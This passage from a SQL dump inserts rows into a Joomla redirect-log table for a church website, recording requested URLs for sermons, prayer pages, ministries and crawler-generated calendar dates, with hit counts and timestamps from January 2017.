(273, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 6, 0, '2017-01-02 09:05:39', '0000-00-00 00:00:00', 301),
(274, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 31, 0, '2017-01-02 09:05:42', '0000-00-00 00:00:00', 301),
(275, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-02 10:19:01', '0000-00-00 00:00:00', 301),
(276, 'http://www.lifeoasisinternationalchurch.org/template-info/books', NULL, '', '', 89, 0, '2017-01-02 10:23:05', '0000-00-00 00:00:00', 301),
(277, 'http://lifeoasisinternationalchurch.org/ministries/gin', NULL, '', '', 39, 0, '2017-01-02 10:37:57', '0000-00-00 00:00:00', 301),
(278, 'http://lifeoasisinternationalchurch.org/ministries/ljmti', NULL, '', '', 34, 0, '2017-01-02 10:52:16', '0000-00-00 00:00:00', 301),
(279, 'http://lifeoasisinternationalchurch.org/resources/streaming-registered', NULL, '', '', 40, 0, '2017-01-02 10:52:17', '0000-00-00 00:00:00', 301),
(280, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/theme?format=feed&limitstart=&type=rss', NULL, '', '', 3, 0, '2017-01-02 10:52:28', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(281, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/23/-', NULL, '', '', 1, 0, '2017-01-02 10:53:04', '0000-00-00 00:00:00', 301),
(282, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/21/-', NULL, '', '', 1, 0, '2017-01-02 10:53:14', '0000-00-00 00:00:00', 301),
(283, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/8/-', NULL, '', '', 1, 0, '2017-01-02 10:53:23', '0000-00-00 00:00:00', 301),
(284, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/30/-', NULL, '', '', 1, 0, '2017-01-02 10:53:32', '0000-00-00 00:00:00', 301),
(285, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/17/-', NULL, '', '', 1, 0, '2017-01-02 10:53:41', '0000-00-00 00:00:00', 301),
(286, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/24/-', NULL, '', '', 1, 0, '2017-01-02 10:53:50', '0000-00-00 00:00:00', 301),
(287, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/6/-', NULL, '', '', 1, 0, '2017-01-02 10:54:00', '0000-00-00 00:00:00', 301),
(288, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/7/-', NULL, '', '', 1, 0, '2017-01-02 10:54:09', '0000-00-00 00:00:00', 301),
(289, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/9/-', NULL, '', '', 1, 0, '2017-01-02 10:54:18', '0000-00-00 00:00:00', 301),
(290, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/20/-', NULL, '', '', 1, 0, '2017-01-02 10:54:27', '0000-00-00 00:00:00', 301),
(291, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/10/-', NULL, '', '', 1, 0, '2017-01-02 10:54:36', '0000-00-00 00:00:00', 301),
(292, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/14/-', NULL, '', '', 1, 0, '2017-01-02 10:54:45', '0000-00-00 00:00:00', 301),
(293, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/12/-', NULL, '', '', 1, 0, '2017-01-02 10:54:55', '0000-00-00 00:00:00', 301),
(294, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/14/-', NULL, '', '', 1, 0, '2017-01-02 10:55:04', '0000-00-00 00:00:00', 301),
(295, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/24/-', NULL, '', '', 1, 0, '2017-01-02 10:55:13', '0000-00-00 00:00:00', 301),
(296, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/18/-', NULL, '', '', 1, 0, '2017-01-02 10:55:22', '0000-00-00 00:00:00', 301),
(297, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/7/-', NULL, '', '', 1, 0, '2017-01-02 10:55:31', '0000-00-00 00:00:00', 301),
(298, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/15/-', NULL, '', '', 1, 0, '2017-01-02 10:55:45', '0000-00-00 00:00:00', 301),
(299, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/31/-', NULL, '', '', 1, 0, '2017-01-02 10:55:49', '0000-00-00 00:00:00', 301),
(300, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/23/-', NULL, '', '', 1, 0, '2017-01-02 10:55:59', '0000-00-00 00:00:00', 301),
(301, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/15/-', NULL, '', '', 1, 0, '2017-01-02 10:56:09', '0000-00-00 00:00:00', 301),
(302, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/31/-', NULL, '', '', 1, 0, '2017-01-02 10:56:17', '0000-00-00 00:00:00', 301),
(303, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/4/-', NULL, '', '', 1, 0, '2017-01-02 10:56:27', '0000-00-00 00:00:00', 301),
(304, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/16/-', NULL, '', '', 1, 0, '2017-01-02 10:56:36', '0000-00-00 00:00:00', 301),
(305, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/26/-', NULL, '', '', 1, 0, '2017-01-02 10:56:45', '0000-00-00 00:00:00', 301),
(306, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/3/-', NULL, '', '', 1, 0, '2017-01-02 10:56:54', '0000-00-00 00:00:00', 301),
(307, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/12/-', NULL, '', '', 1, 0, '2017-01-02 10:57:04', '0000-00-00 00:00:00', 301),
(308, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/10/-', NULL, '', '', 1, 0, '2017-01-02 10:57:13', '0000-00-00 00:00:00', 301),
(309, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/10/-', NULL, '', '', 1, 0, '2017-01-02 10:57:31', '0000-00-00 00:00:00', 301),
(310, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1953/12/-', NULL, '', '', 1, 0, '2017-01-02 10:57:53', '0000-00-00 00:00:00', 301),
(311, 'http://www.lifeoasisinternationalchurch.org/resources/iradio', NULL, '', '', 6, 0, '2017-01-02 11:11:47', '0000-00-00 00:00:00', 301),
(312, 'http://lifeoasisinternationalchurch.org/template-info-2/the-church/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-02 11:55:40', '0000-00-00 00:00:00', 301),
(313, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/responsive', NULL, '', '', 1, 0, '2017-01-02 11:59:25', '0000-00-00 00:00:00', 301),
(314, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/series', NULL, '', '', 8, 0, '2017-01-02 12:38:11', '0000-00-00 00:00:00', 301),
(315, 'http://www.lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors', NULL, 'https://www.google.co.uk/', '', 42, 0, '2017-01-02 12:57:20', '0000-00-00 00:00:00', 301),
(316, 'http://www.lifeoasisinternationalchurch.org/index.php/129-prayer-focus-for-day-6', NULL, '', '', 8, 0, '2017-01-02 12:58:02', '0000-00-00 00:00:00', 301),
(317, 'http://www.lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun', NULL, 'https://www.google.com/', '', 52, 0, '2017-01-02 13:04:49', '0000-00-00 00:00:00', 301),
(318, 'http://www.lifeoasisinternationalchurch.org/index.php/231-2016-day-14', NULL, '', '', 11, 0, '2017-01-02 13:22:17', '0000-00-00 00:00:00', 301),
(319, 'http://www.lifeoasisinternationalchurch.org/media/com_sermonspeaker/css/css-912078896e10e015862d7602e0585df2.php', NULL, '', '', 38, 0, '2017-01-02 14:06:57', '0000-00-00 00:00:00', 301),
(320, 'https://www.spiritmeat.net/11-demo-articles/20-welcome', NULL, '', '', 1, 0, '2017-01-02 14:18:07', '0000-00-00 00:00:00', 301),
(321, 'http://www.lifeoasisinternationalchurch.org/template-info-2/our-belief', NULL, '', '', 47, 0, '2017-01-02 14:28:10', '0000-00-00 00:00:00', 301),
(322, 'http://www.lifeoasisinternationalchurch.org/index.php/140-day-14', NULL, '', '', 6, 0, '2017-01-02 14:59:15', '0000-00-00 00:00:00', 301),
(323, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/theme?format=feed&limitstart=', NULL, '', '', 3, 0, '2017-01-02 15:13:53', '0000-00-00 00:00:00', 301),
(324, 'http://www.lifeoasisinternationalchurch.org/index.php/127-prayer-focus-for-day-5', NULL, '', '', 7, 0, '2017-01-02 15:24:04', '0000-00-00 00:00:00', 301),
(325, 'http://lifeoasisinternationalchurch.org/35-prayer-a-fasting-day-26', NULL, '', '', 2, 0, '2017-01-02 15:29:55', '0000-00-00 00:00:00', 301),
(326, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 7, 0, '2017-01-02 16:37:10', '0000-00-00 00:00:00', 301),
(327, 'http://www.lifeoasisinternationalchurch.org/template-info/mimmp', NULL, '', '', 76, 0, '2017-01-02 16:37:11', '0000-00-00 00:00:00', 301),
(328, 'https://www.spiritmeat.net/about-us/our-service-schedule', NULL, '', '', 1, 0, '2017-01-02 16:42:15', '0000-00-00 00:00:00', 301),
(329, 'https://www.spiritmeat.net/about-us/rev-oyenike-areogun', NULL, '', '', 1, 0, '2017-01-02 16:42:17', '0000-00-00 00:00:00', 301),
(330, 'https://www.spiritmeat.net/about-us/the-church-2', NULL, '', '', 1, 0, '2017-01-02 16:42:19', '0000-00-00 00:00:00', 301),
(331, 'https://www.spiritmeat.net/component/content/article/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-02 16:42:24', '0000-00-00 00:00:00', 301),
(332, 'https://www.spiritmeat.net/featured-messages', NULL, '', '', 1, 0, '2017-01-02 16:42:26', '0000-00-00 00:00:00', 301),
(333, 'https://www.spiritmeat.net/ministries/books', NULL, '', '', 1, 0, '2017-01-02 16:43:58', '0000-00-00 00:00:00', 301),
(334, 'https://www.spiritmeat.net/ministries/gin', NULL, '', '', 1, 0, '2017-01-02 16:44:00', '0000-00-00 00:00:00', 301),
(335, 'https://www.spiritmeat.net/ministries/ljmti', NULL, '', '', 1, 0, '2017-01-02 16:44:02', '0000-00-00 00:00:00', 301),
(336, 'https://www.spiritmeat.net/ministries/media-outreach', NULL, '', '', 1, 0, '2017-01-02 16:44:04', '0000-00-00 00:00:00', 301),
(337, 'https://www.spiritmeat.net/ministries/mimmp', NULL, '', '', 1, 0, '2017-01-02 16:44:06', '0000-00-00 00:00:00', 301),
(338, 'https://www.spiritmeat.net/ministries/musci', NULL, '', '', 1, 0, '2017-01-02 16:44:08', '0000-00-00 00:00:00', 301),
(339, 'https://www.spiritmeat.net/ministries/outreach', NULL, '', '', 1, 0, '2017-01-02 16:44:11', '0000-00-00 00:00:00', 301),
(340, 'https://www.spiritmeat.net/ministries/wimmp', NULL, '', '', 1, 0, '2017-01-02 16:44:13', '0000-00-00 00:00:00', 301),
(341, 'http://lifeoasisinternationalchurch.org/component/prayercenter/?task=newreq&Itemid=10111', NULL, '', '', 1, 0, '2017-01-02 16:48:30', '0000-00-00 00:00:00', 301),
(342, 'http://www.lifeoasisinternationalchurch.org/resources/daily-bible-reading', NULL, '', '', 28, 0, '2017-01-02 17:20:03', '0000-00-00 00:00:00', 301),
(343, 'http://lifeoasisinternationalchurch.org/xmlrpc.php?rsd', NULL, '', '', 24, 0, '2017-01-02 18:28:16', '0000-00-00 00:00:00', 301),
(344, 'http://lifeoasisinternationalchurch.org/wordpress/', NULL, '', '', 81, 0, '2017-01-02 18:28:17', '0000-00-00 00:00:00', 301),
(345, 'http://lifeoasisinternationalchurch.org/testimonies/icalrepeat.detail/2012/01/11/45/15/living-by-the-answer', NULL, '', '', 2, 0, '2017-01-02 18:34:08', '0000-00-00 00:00:00', 301),
(346, 'http://lifeoasisinternationalchurch.org/104-prayer-focus-for-day-13', NULL, '', '', 1, 0, '2017-01-02 18:34:08', '0000-00-00 00:00:00', 301),
(347, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 2, 0, '2017-01-02 18:38:33', '0000-00-00 00:00:00', 301),
(348, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-02 19:41:48', '0000-00-00 00:00:00', 301),
(349, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/5/-', NULL, '', '', 1, 0, '2017-01-02 19:43:21', '0000-00-00 00:00:00', 301),
(350, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/13/-', NULL, '', '', 1, 0, '2017-01-02 19:43:21', '0000-00-00 00:00:00', 301),
(351, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/22/-', NULL, '', '', 1, 0, '2017-01-02 19:43:24', '0000-00-00 00:00:00', 301),
(352, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/17/-', NULL, '', '', 1, 0, '2017-01-02 19:43:29', '0000-00-00 00:00:00', 301),
(353, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/18/-', NULL, '', '', 1, 0, '2017-01-02 19:43:38', '0000-00-00 00:00:00', 301),
(354, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/4/-', NULL, '', '', 1, 0, '2017-01-02 19:43:47', '0000-00-00 00:00:00', 301),
(355, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/27/-', NULL, '', '', 1, 0, '2017-01-02 19:43:56', '0000-00-00 00:00:00', 301),
(356, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/15/-', NULL, '', '', 1, 0, '2017-01-02 19:44:14', '0000-00-00 00:00:00', 301),
(357, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/25/-', NULL, '', '', 1, 0, '2017-01-02 19:44:24', '0000-00-00 00:00:00', 301),
(358, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/27/-', NULL, '', '', 1, 0, '2017-01-02 19:44:30', '0000-00-00 00:00:00', 301),
(359, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/9/-', NULL, '', '', 1, 0, '2017-01-02 19:44:39', '0000-00-00 00:00:00', 301),
(360, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/6/-', NULL, '', '', 1, 0, '2017-01-02 19:44:47', '0000-00-00 00:00:00', 301),
(361, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/8/-', NULL, '', '', 1, 0, '2017-01-02 19:44:56', '0000-00-00 00:00:00', 301),
(362, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/1/-', NULL, '', '', 1, 0, '2017-01-02 19:45:04', '0000-00-00 00:00:00', 301),
(363, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/28/-', NULL, '', '', 1, 0, '2017-01-02 19:45:13', '0000-00-00 00:00:00', 301),
(364, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/9/-', NULL, '', '', 1, 0, '2017-01-02 19:45:21', '0000-00-00 00:00:00', 301),
(365, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/17/-', NULL, '', '', 1, 0, '2017-01-02 19:45:30', '0000-00-00 00:00:00', 301),
(366, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/6/-', NULL, '', '', 1, 0, '2017-01-02 19:45:39', '0000-00-00 00:00:00', 301),
(367, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/28/-', NULL, '', '', 1, 0, '2017-01-02 19:45:47', '0000-00-00 00:00:00', 301),
(368, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/3/-', NULL, '', '', 1, 0, '2017-01-02 19:45:56', '0000-00-00 00:00:00', 301),
(369, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/29/-', NULL, '', '', 1, 0, '2017-01-02 19:46:04', '0000-00-00 00:00:00', 301),
(370, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/2/-', NULL, '', '', 1, 0, '2017-01-02 19:46:13', '0000-00-00 00:00:00', 301),
(371, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/12/-', NULL, '', '', 1, 0, '2017-01-02 19:46:21', '0000-00-00 00:00:00', 301),
(372, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/16/-', NULL, '', '', 1, 0, '2017-01-02 19:46:31', '0000-00-00 00:00:00', 301),
(373, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/19/-', NULL, '', '', 1, 0, '2017-01-02 19:46:39', '0000-00-00 00:00:00', 301),
(374, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/14/-', NULL, '', '', 1, 0, '2017-01-02 19:46:48', '0000-00-00 00:00:00', 301),
(375, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/21/-', NULL, '', '', 1, 0, '2017-01-02 19:46:56', '0000-00-00 00:00:00', 301),
(376, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/2/-', NULL, '', '', 1, 0, '2017-01-02 19:47:05', '0000-00-00 00:00:00', 301),
(377, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/25/-', NULL, '', '', 1, 0, '2017-01-02 19:48:03', '0000-00-00 00:00:00', 301),
(378, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1948/2/-', NULL, '', '', 1, 0, '2017-01-02 20:03:05', '0000-00-00 00:00:00', 301),
(379, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/arrowthemes?format=feed&type=atom', NULL, '', '', 1, 0, '2017-01-02 20:15:17', '0000-00-00 00:00:00', 301),
(380, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=e8ecae39ac5388be617f6b64664cbc4e6c927b08&task=ajax&action=unloaded', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-01-02 20:17:07', '0000-00-00 00:00:00', 301),
(381, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/25/-', NULL, '', '', 1, 0, '2017-01-02 20:18:13', '0000-00-00 00:00:00', 301),
(382, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, 'https://www.google.com.ng/', '', 676, 0, '2017-01-02 20:33:12', '0000-00-00 00:00:00', 301),
(383, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/music', NULL, '', '', 1, 0, '2017-01-02 20:48:46', '0000-00-00 00:00:00', 301),
(384, 'http://www.lifeoasisinternationalchurch.org/ministries/media-outreach', NULL, 'https://www.google.com.ng/', '', 57, 0, '2017-01-02 20:51:15', '0000-00-00 00:00:00', 301),
(385, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/media-outreach', NULL, 'http://www.spiritmeat.net/', '', 330, 0, '2017-01-02 21:13:47', '0000-00-00 00:00:00', 301),
(386, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/3-column', NULL, '', '', 2, 0, '2017-01-02 21:22:16', '0000-00-00 00:00:00', 301),
(387, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 3, 0, '2017-01-02 21:24:15', '0000-00-00 00:00:00', 301),
(388, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 65, 0, '2017-01-02 21:35:43', '0000-00-00 00:00:00', 301),
(389, 'http://www.lifeoasisinternationalchurch.org/cache/js-ecb9b3b66c1543498b4dab570ffb7189.php', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 5, 0, '2017-01-02 21:40:13', '0000-00-00 00:00:00', 301),
(390, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-02 21:55:45', '0000-00-00 00:00:00', 301),
(391, 'http://www.lifeoasisinternationalchurch.org/60-day8', NULL, '', '', 8, 0, '2017-01-02 22:44:17', '0000-00-00 00:00:00', 301),
(392, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/AudioJungle', NULL, '', '', 1, 0, '2017-01-02 23:02:43', '0000-00-00 00:00:00', 301),
(393, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 33, 0, '2017-01-02 23:28:21', '0000-00-00 00:00:00', 301),
(394, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/sunday-school', NULL, '', '', 1, 0, '2017-01-02 23:36:13', '0000-00-00 00:00:00', 301),
(395, 'http://lifeoasisinternationalchurch.org/ministries/media-outreach', NULL, 'http://lifeoasisinternationalchurch.org', '', 37, 0, '2017-01-02 23:40:09', '0000-00-00 00:00:00', 301),
(396, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-03 00:09:42', '0000-00-00 00:00:00', 301),
(397, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-03 00:43:11', '0000-00-00 00:00:00', 301),
(398, 'http://lifeoasisinternationalchurch.org/payment', NULL, '', '', 67, 0, '2017-01-03 00:44:07', '0000-00-00 00:00:00', 301),
(399, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-03 01:16:41', '0000-00-00 00:00:00', 301),
(400, 'http://www.lifeoasisinternationalchurch.org//popup-pomo.php', NULL, '', '', 2, 0, '2017-01-03 01:17:39', '0000-00-00 00:00:00', 301),
(401, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/13/-', NULL, '', '', 1, 0, '2017-01-03 01:29:08', '0000-00-00 00:00:00', 301),
(402, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/28/-', NULL, '', '', 1, 0, '2017-01-03 01:32:40', '0000-00-00 00:00:00', 301),
(403, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/16/-', NULL, '', '', 1, 0, '2017-01-03 01:44:01', '0000-00-00 00:00:00', 301),
(404, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-03 01:50:10', '0000-00-00 00:00:00', 301),
(405, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/10/-', NULL, '', '', 1, 0, '2017-01-03 01:51:35', '0000-00-00 00:00:00', 301),
(406, 'http://www.lifeoasisinternationalchurch.org/videos/18-loic/50-young-achievers', NULL, '', '', 10, 0, '2017-01-03 01:53:48', '0000-00-00 00:00:00', 301),
(407, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/27/-', NULL, '', '', 1, 0, '2017-01-03 01:55:22', '0000-00-00 00:00:00', 301),
(408, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/19/-', NULL, '', '', 1, 0, '2017-01-03 01:59:09', '0000-00-00 00:00:00', 301),
(409, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/11/-', NULL, '', '', 1, 0, '2017-01-03 02:02:56', '0000-00-00 00:00:00', 301),
(410, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/5/-', NULL, '', '', 1, 0, '2017-01-03 02:06:43', '0000-00-00 00:00:00', 301),
(411, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/19/-', NULL, '', '', 1, 0, '2017-01-03 02:10:30', '0000-00-00 00:00:00', 301),
(412, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/23/-', NULL, '', '', 1, 0, '2017-01-03 02:14:17', '0000-00-00 00:00:00', 301),
(413, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/29/-', NULL, '', '', 1, 0, '2017-01-03 02:18:04', '0000-00-00 00:00:00', 301),
(414, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/1/-', NULL, '', '', 1, 0, '2017-01-03 02:21:51', '0000-00-00 00:00:00', 301),
(415, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/21/-', NULL, '', '', 1, 0, '2017-01-03 02:25:38', '0000-00-00 00:00:00', 301),
(416, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/4/-', NULL, '', '', 1, 0, '2017-01-03 02:29:25', '0000-00-00 00:00:00', 301),
(417, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/2/-', NULL, '', '', 1, 0, '2017-01-03 02:33:12', '0000-00-00 00:00:00', 301),
(418, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/22/-', NULL, '', '', 1, 0, '2017-01-03 02:36:59', '0000-00-00 00:00:00', 301),
(419, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/13/-', NULL, '', '', 1, 0, '2017-01-03 02:40:46', '0000-00-00 00:00:00', 301),
(420, 'http://www.lifeoasisinternationalchurch.org/resources/livestream1', NULL, '', '', 47, 0, '2017-01-03 02:42:41', '0000-00-00 00:00:00', 301),
(421, 'http://www.lifeoasisinternationalchurch.org/resources/french', NULL, '', '', 36, 0, '2017-01-03 02:42:41', '0000-00-00 00:00:00', 301),
(422, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/1/-', NULL, '', '', 1, 0, '2017-01-03 02:44:33', '0000-00-00 00:00:00', 301),
(423, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/10/-', NULL, '', '', 1, 0, '2017-01-03 02:48:21', '0000-00-00 00:00:00', 301),
(424, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/2/-', NULL, '', '', 1, 0, '2017-01-03 02:52:07', '0000-00-00 00:00:00', 301),
(425, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/27/-', NULL, '', '', 1, 0, '2017-01-03 02:55:54', '0000-00-00 00:00:00', 301),
(426, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/Joomla', NULL, '', '', 1, 0, '2017-01-03 02:57:08', '0000-00-00 00:00:00', 301),
(427, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/3/-', NULL, '', '', 1, 0, '2017-01-03 02:59:41', '0000-00-00 00:00:00', 301),
(428, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/23/-', NULL, '', '', 1, 0, '2017-01-03 03:03:28', '0000-00-00 00:00:00', 301),
(429, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/14/-', NULL, '', '', 1, 0, '2017-01-03 03:07:16', '0000-00-00 00:00:00', 301),
(430, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/24/-', NULL, '', '', 1, 0, '2017-01-03 03:11:04', '0000-00-00 00:00:00', 301),
